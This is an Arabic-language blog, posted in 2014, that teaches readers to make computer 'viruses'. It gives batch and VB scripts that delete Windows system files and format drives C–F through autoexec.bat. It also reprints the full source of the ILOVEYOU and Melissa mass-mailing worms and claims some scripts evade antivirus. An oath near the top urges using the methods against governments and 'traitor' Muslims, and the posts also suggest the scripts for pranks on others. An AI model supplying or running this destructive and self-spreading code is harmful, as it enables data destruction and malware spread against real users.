‏إظهار الرسائل ذات التسميات virus. إظهار كافة الرسائل

لمسالة بسيطة جدا تعتمد فقط على الدالة kill
فمثلا اذا كنت تريد ان تمحي الريجستري تضع:
on error resume next
kill c:/windows/regedit.exe
ودائما ضع الجملة on error resume next قبل القيام باي عملية تجنبا للاخطاء...
ملاحظة:اذا كنت تريد تصنع فيروس يجب ان تضبط الخاصية visible للform عند false
ومثلا هذا فيروس يقوم بقتل الويندوز
on error resume next
kill c:\windows\system\msconfig.exe

killc:\windows\Rundll32.exe

kill c:\windows\regedit.exe

kill c:\windows\Rundll.exe

kill c:\Autoexec.bat

kill c:\command.com

kill c:\windows\Logos.sys

kill c:\windows\Logow.sys

kill c:\windows\Scanregw.exe

kill C:\Program Files\Internet Explorer\Iexplore.exe

kill c:\windows\system\Sysedit.exe

kill c:\windows\win.com

ولنتطرق الى موضوع اخر من الفيروسات...
فمثلا هذا فيروس يقوم بنسخ برنامج الnotepad في الويندوز 5000 مرة...
on error resume next
for i= 1 to 5000
FileCopy "c:/windows/notepad.exe", "c:/windows/notepad" & i & ".exe"
Next i
الأربعاء، 7 مايو 2014
بواسطة Unknown
تصنيف :
هذه ليست فيروسات, بل هي آوامر مدمره تدمر الجهاز

وهي شبيهة جدا بلفيروسات ونستطيع تسميتها بلفيروسات
وأرجو من جميع الأخوه الخبراء إذا كان الموضوع ناقصا أو فيه نوع من الخطأ أن لا يبخلو علينا بلنقدالبناء.. والتصليح
عند البدء يجب علينا أن نتعاهد على هذا القسم
أقسم بلله العظيم ألا أستخدم هذه الطرق لإلحاق الأذى بلمسلمين بدون حق شرعي

وأقسم بلله العظيم أن ألا أستخدم هذه الطرق بهدف الإنتقام وتصفيه الحسابات وخاصه بين الشباب المراهقين بدون حق شرعي
وأقسم بلله العظيم أن أحرص على أن أستخدم هذه الطرق لإلحاق الأذى

بلحكومات الإسلاميه والعربيه الخائنه والتابعه لأمريكا وإسرائيل وماشابه ذلك

وأقسم بلله العظيم أن أستخدم هذه الطرق ضد المسلمين الخونه والمرتدين

الذين يكيدون للإسلام والمسلمين وماشابه ذلك

وأن ينحصر إستخدامي لهذه الطرق بهدف خدمه الإسلام والمسلمين
وأنا أبرء ذمتي أمام الله بمن ينكث بهذا القسم
والله خير الشاهدين

آلان نبدأ

إياكم أن تقومو بتجربتها على أجهزتكم
إذهب إلى Notepad وقم بنسخ هذه الأكواد

وأتبع التعليمات خطوه بخطوه

echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat

وبعد لصقه في المفكرة

واحفظه بهذا الاسم

AUTOEXEC.BAT

وبعدين راح ينشأ لك فيروس
إنتهى

ولا تفكر تفتح الملف بعد صنعه
********************************************************
وقم بنسخ هذا الكود في المفكرة

del C:windows *.ini *.exe *.scr *.txt *.log
del C:windowssystem32 *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys*.dll
del C:windowssystem *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll

وبعد لصقه في المفكرة

واحفظه بهذا الاسم

maker.bat

و بهذا يكون الأمر قد أنتها في صنع الفيروس

إنتهى

ولاتفكر تفتح الملف بعد صنعه

************************************************** ******
عمل فورمات C,D,E,F والطابعه

وقم بنسخ هذا الكود في المفكرة

callattrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
echo as ansar
echo as ansar

وبعد لصقه في المفكرة

واحفظه بهذا الاسم

not.bat

إنتهى

ولا تفكر تفتح الملف بعد صنعه

**************************************************
عمل فورمات C,D,E,F والطابعه واعادة تشغيل الجهاز

وقم بنسخ هذا الكود في المفكرة

callattrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
echo as ansar
echo as ansar
c:\windows\rundll.exe user.exe,exitwindowsexec

وبعدلصقه في المفكرة

واحفظه بهذا الاسم

not.bat

إنتهى

ولا تفكر تفتح الملف بعد صنعه

**************************************************
عمل فورمات C,D,E,F والطابعه وقفل الجهاز

وقم بنسخ هذا الكود في المفكرة

call attrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
echo as ansar
echo as ansar
c:\windows\rundll32.exe user.exe,exitwindows

وبعدلصقه في المفكرة

واحفظه بهذا الاسم

not.bat

إنتهى

ولاتفكر تفتح الملف بعد صنعه

**************************************************
عمل فورمات للجهاز فورا

وقم بنسخ هذا الكود في المفكرة

echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat

وبعدلصقه في المفكرة

واحفظه بهذا الاسم

not.bat

إنتهى

ولاتفكر تفتح الملف بعد صنعه
************************************************** ***************************************************
اهم فايروس مدمر

وقم بنسخ هذا الكود في المفكرة

echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat

وبعد لصقه في المفكرة

واحفظه بهذا الاسم

not.bat

إنتهى

ولاتفكر تفتح الملف بعد صنعه
هذا فايرس بصراحه حقير وهذا الرابط يشرح لكم

http://www.youtube.com/watch?v=EiHHk...eature=related

وهذا الكود

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

ثانيا :اعمل save ب اسم whatever.bat

ثالثا: اعمل all files فى save as type
إنتهى

************************************************** ****

ملاحظه هاااااامه جدا جدا جدا
معظم هذه الفيروسات يتم إكتشافها من قبل المضاد للفيروسات
ولكن هذه بعض الفيروسات التي لا يستطيع المضاد الإمساك بها والمثال على هذه الفيروسات
عمل فورمات C,D,E,F

call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
echo as ansar
echo as ansar
c:windowsrundll.exe user.exe,exitwindowsexec

إنتهى

************************************************** *********

عمل فورمات C,D,E,F

call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
echo as ansar
echo as ansar
c:windowsrundll32.exe user.exe,exitwindows

إنتهى

************************************************** *********

تدمير الوندوز وحذف الملفات بعد التشغيل مباشره

@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
echo as ansar

إنتهى

************************************************** *********

قتل الوندوز وحذف كل الملفات بعد اول اعادةتشغيل للجهاز

call attrib -h -r c:autoexec.bat >nul

@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
echo as ansar

إنتهى

************************************************** *********

عمل فورمات للجهاز فورا

code:--------------------------------------------------------------------------------echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y crogra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul>>c:autoexec.bat--------------------------------------------------------------------------------

إنتهى

************************************************** *********

اهم فورمات البنسبه الي

echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y crogra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat

إنتهى

************************************************** *********

جميع الفيروسات السابقه تحفظ على النوت باد بإمتداد bat

مثال: limeware.bat

Soso.bat

FBI.bat

هذهأمثله ولكم حريه إختيار الإسم

وأكرر إياكم فتح هذه الفيروسات على أجهزتكم

إياكم أن تقومو بتجربتها على أجهزتكم

************************************************** *********

الفايروسات القويه الحب
كما تعلمنا سابقا

rem barok -loveletter(vbe) <i hate go to school>rem by: spyder / ispyder@mail.com / @grammersoft group /
Manila,Philippines
On Error Resume Next
Dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
Sub main()
On Error Resume Next
Dim wscr,rr
Set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\oftware\icrosof t\indows Scripting
Host\ettings\imeout")
If (rr>=1) Then
wscr.RegWrite "HKEY_CURRENT_USER\oftware\icrosoft\indows Scripting
Host\ettings\imeout",0,"REG_DWORD"
End If
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\SKernel32.vbs")
c.Copy(dirwin&"\in32DLL.vbs")
c.Copy(dirsystem&"\OVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
End Sub
Sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\oftware\icrosoft\indows\urrent V ersion\un\SKernel32
",dirsystem&"\SKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\oftware\icrosoft\indows\urrent V ersion\unServices\i
n32DLL",dirwin&"\in32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\oftware\icrosof t\nternet
Explorer\ownload Directory")
If (downread="") Then
downread="c:\
End If
If (fileexist(dirsystem&"\inFAT32.exe")=1) Then
Randomize
num = Int((4 * Rnd) + 1)
If num = 1 Then
regcreate "HKCU\oftware\icrosoft\nternet Explorer\ain\tart
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
ElseIf num = 2 Then
regcreate "HKCU\oftware\icrosoft\nternet Explorer\ain\tart
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
ElseIf num = 3 Then
regcreate "HKCU\oftware\icrosoft\nternet Explorer\ain\tart
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
ElseIf num = 4 Then
regcreate "HKCU\oftware\icrosoft\nternet Explorer\ain\tart
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237 461234iuy7thjg/WIN-BUGSFIX
.exe"
End If
End If
If (fileexist(downread&"\IN-BUGSFIX.exe")=0) Then
regcreate
"HKEY_LOCAL_MACHINE\oftware\icrosoft\indows\urrent V ersion\un\IN-BUGSFI
X",downread&"\IN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\oftware\icrosoft\nternet Explorer\ain\tart
Page","about_:blank"
End If
End Sub
Sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d In dc
If d.DriveType = 2 Or d.DriveType=3 Then
folderlist(d.path&"\)
End If
Next
listadriv = s
End Sub
Sub infectfiles(folderspec)
On Error Resume Next
Dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
Set f = fso.GetFolder(folderspec)
Set fc = f.Files
For Each f1 In fc
ext=fso.GetExtensionName(f1.path)
ext=LCase(ext)
s=LCase(f1.Name)
If (ext="vbs") Or (ext="vbe") Then
Set ap=fso.OpenTextFile(f1.path,2,True)
ap.write vbscopy
ap.Close
ElseIf(ext="js")Or (ext="jse") Or (ext="css") Or (ext="wsh") Or(ext="sct")
Or (ext="hta") Then
Set ap=fso.OpenTextFile(f1.path,2,True)
ap.write vbscopy
ap.Close
bname=fso.GetBaseName(f1.path)
Set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\&bname&".vbs")
fso.DeleteFile(f1.path)
ElseIf(ext="jpg") Or (ext="jpeg") Then
Set ap=fso.OpenTextFile(f1.path,2,True)
ap.write vbscopy
ap.Close
Set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
ElseIf(ext="mp3") Or (ext="mp2") Then
Set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.Close
Set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
End If
If (eq<>folderspec) Then
If (s="mirc32.exe") Or (s="mlink32.exe") Or(s="mirc.ini") Or
(s="script.ini") Or (s="mirc.hlp") Then
Set scriptini=fso.CreateTextFile(folderspec&"\cript.in i")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com/"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{
scriptini.WriteLine "n1= /if ( $nick == $me ) {halt }
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\OVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}
scriptini.Close
eq=folderspec
End If
End If
Next
End Sub
Sub folderlist(folderspec)
On Error Resume Next
Dim f,f1,sf
Set f = fso.GetFolder(folderspec)
Set sf = f.SubFolders
For Each f1 In sf
infectfiles(f1.path)
folderlist(f1.path)
Next
End Sub
Sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
End Sub
Function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
End Function
Function fileexist(filespec)
On Error Resume Next
Dim msg
If (fso.FileExists(filespec)) Then
msg = 0
Else
msg = 1
End If
fileexist = msg
End Function
Function folderexist(folderspec)
On Error Resume Next
Dim msg
If (fso.GetFolderExists(folderspec)) Then
msg = 0
Else
msg = 1
End If
fileexist = msg
End Function
Sub spreadtoemail()
On Error Resume Next
Dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
Set regedit=CreateObject("WScript.Shell")
Set out=WScript.CreateObject("Outlook.Application")
Set mapi=out.GetNameSpace("MAPI")
For ctrlists=1 To mapi.AddressLists.Count
Set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\oftware\ic rosoft\AB\&a)
If (regv="") Then
regv=1
End If
If (Int(a.AddressEntries.Count)>Int(regv)) Then
For ctrentries=1 To a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\oftware\i crosoft\AB\&malead)
If (regad="") Then
Set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming fromme."
male.Attachments.Add(dirsystem&"\OVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\oftware\icrosoft\AB\&malead,1," REG_DWORD"
End If
x=x+1
Next
regedit.RegWrite
"HKEY_CURRENT_USER\oftware\icrosoft\AB\&a,a.Addres sEntries.Count
Else
regedit.RegWrite
"HKEY_CURRENT_USER\oftware\icrosoft\AB\&a,a.Addres sEntries.Count
End If
Next
Set out=Nothing
Set mapi=Nothing
End Sub
Sub html
On Error Resume Next
Dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER -HTML<?-?TITLE><META
NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS -LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is
good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY
ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveXControl<?-?p><p>To Enable to read
this HTML file<BR>- Please press #-#YES#-# button to Enable
ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>
"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){ar wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.re sizeTo(wi,hi);}&vbcrlf&_
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit "&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="setfso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39 ))"&vbcrlf&_
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(3 4))"&vbcrlf&_
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(9 2))"&vbcrlf&_
"setwri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf&_
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@))then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initializeActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru
n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,Chr(35)&Chr(45)&Chr(35),"'")
dt1=replace(dt1,Chr(64)&Chr(45)&Chr(64),"""")
dt4=replace(dt1,Chr(63)&Chr(45)&Chr(63),"/")
dt5=replace(dt4,Chr(94)&Chr(45)&Chr(94),"\)
dt2=replace(dta2,Chr(35)&Chr(45)&Chr(35),"'")
dt2=replace(dt2,Chr(64)&Chr(45)&Chr(64),"""")
dt3=replace(dt2,Chr(63)&Chr(45)&Chr(63),"/")
dt6=replace(dt3,Chr(94)&Chr(45)&Chr(94),"\)
Set fso=CreateObject("Scripting.FileSystemObject")
Set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=UBound(lines)
For n=0 To UBound(lines)
lines(n)=replace(lines(n),"'",Chr(91)+Chr(45)+Chr( 91))
lines(n)=replace(lines(n),"""",Chr(93)+Chr(45)+Chr (93))
lines(n)=replace(lines(n),"\,Chr(37)+Chr(45)+Chr(3 7))
If (l1=n) Then
lines(n)=Chr(34)+lines(n)+Chr(34)
Else
lines(n)=Chr(34)+lines(n)+Chr(34)&"&vbcrlf& _"
End If
Next
Set b=fso.CreateTextFile(dirsystem+"\OVE-LETTER-FOR-YOU.HTM")
b.Close
Set d=fso.OpenTextFile(dirsystem+"\OVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.Close
End Sub

************************************************** *********

فايروسمليسيا فايروس خطير

Private Sub AutoOpen() On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\.0\ord\e curity","Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabl ed =False
System.PrivateProfileString("","HKEY_CURRENT_USER\ oftware\icrosoft\ffice\.0\ord\ecurity","Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("","HKEY_CURRENT_USER\ oftware\icrosoft\ffice\, "Melissa?") <>"... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don'tshow anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("","HKEY_CURRENT_USER\ oftware\icrosoft\ffice\, "Melissa?") ="... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name,"Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False)Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points,plustriple-word-score, plus fifty points for using all my letters.Game's over. I'moutta here."
End Sub

************************************************** *********
الأحد، 6 أبريل 2014
بواسطة Unknown
تصنيف :
سوف نقوم الآن بتعلم تصميم الفيروسات بواسطة notepad
إذا أردتم تصميم فيروس بهذا النوع من التصميمات يجب أن تعرفوا كيف تضعون الأكواد التي سوف أعطيها لكم و هي عن طريق فتح برنامج notepad وكتابة الكود فيه ثم حفظه بأي اسم تريده ولكن بامتداد .bat
و الآن كل ما عليكم هو أن تضعوا الكود الذي ترغبون فيه ونسخه إلى notepad و تحفظه و بعدها يكون الفيروس قد أنشئ ولكن أحذر كما تعرفون لا تفتحوا الملف وإلا ...... وقد أعذر من أنذر

نبدا بسم الله :

الكود الأول :
---------------------


كود:
@Echo off 
c: 
cd %WinDir%\System\ 
deltree /y *.dll 
cd\ 
deltree /y *.sys
الـتوضـــــــــــتيح :
* بعد أن قمت بوضع الكود و حفظه بامتداد .bat فأنت هكذا تكون قد قمت بعمل فيروس و سوف تلحظ أن شكل الأيقونة قد أصبح بهذا الشكل :

* هذا الفيروس يقوم على مسح كل ملفات dll و sys من system وهذا ما سوف نلحظه بالنظر إلى الكود و به سوف نجد أنه كتب فى هذا الكود امر " deltree " و هو الخاص بمسح الملفات ثم كتب بعد ذلك " *.dll كما كتب *.sys " و هو انى قد اعطيت له بان يمسح كل الملفات التى لها الأمتدادين السابقين و يمكن ملاحظة شيء آخر و هو كون الكمبيوتر يمسح الملفات من system و سوف نجد فى أول الكود الأمر الخاص بذلك فسوف تجد أنه قد أعطى له الأمر بالذهاب إلى c: و كما أعطاه الأمر بالذهاب لملفات الوندوز عندما أصدرنا له الأمر windir ثم أخبرناه أن الأوامر التالية يجب أن تكون داخل ملف system و هو موجود ضمن ملفات الويندوز
* بعد أن فهمنا هذه الأوامر ..... هل هناك من يستطيع الإجابة على سؤالي و هو : هل يمكننا تعديل هذا الكود ؟!!

لن ادعكم تفكرون طويلا فى الأجابة سوف أجيب بكل بساطة عن السؤال و هو يمكننا أن نغير أى شئ قد فهمناه جيدا لذا يمكننا أن نغير هذا الكود قليلا وسأخبركم عما هو يمكننا أن نغيره و طبعا أنتم تعرفون المكان الذي يمكننا أن نغيره في الكود فيمكننا أن نغير نوعية الملفات التى سيقوم بمسحها أو يمكننا زيادتها كما يمكننا أن نغير المكان الذى سوف يوجد فيه فمثلا هناك يوجد أنواع لأنظمة التشغيل فهناك من يضع مثلا ويندوز 98 و هناك من يضع Xp لذا يمكننا أن نغير اتجاه الفيروس إلى d:
مثال توضيحى :
أنا الآن أريد أن أمزح مع أحد و فى نفس الوقت أريد أن اعلمه درس فيمكنني أن أصنع فيروس يقوم بمسح جميع ملفات الصور التى امتددها *.jpg. كما أننى أريد أن أمسح جميع الملفات التي امتددها *.mp3 و جميع امتدادت الملفات الخاصة بالأفلام و التي امتدادها *.asf و التى توجد في E: كل ما علينا هو تعديل الكود ليصبح هكذا:

كود:
@Echo off 
e: 
deltree /y *.jpg 
cd\ 
deltree /y *.mp3 
cd\ 
deltree /y *.asf
ما رأيكم في الفيروس الجديد أتمنى أن يعجبكم أما الآن ندخل في الكود الثاني:
----------------
الكود الثانى :
--------------
كود:
echo off@ 
cls 
call attrib -h -r c:\autoexec.bat >nul 
echo @echo off >c:\autoexec.bat 
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat 
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat 
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat 
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat 
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
الـتوضــــــــــيح :
الفيروس السابق يعتبر من الأفكار الجيدة للزين هما من محبين فى البرمجة وافهمين فى فكرة عمل لكمبيوتر و ليس ممن هم من هواة تعلم برنامج صغير ثم يقول عى نفسه خبير كمبيوتر
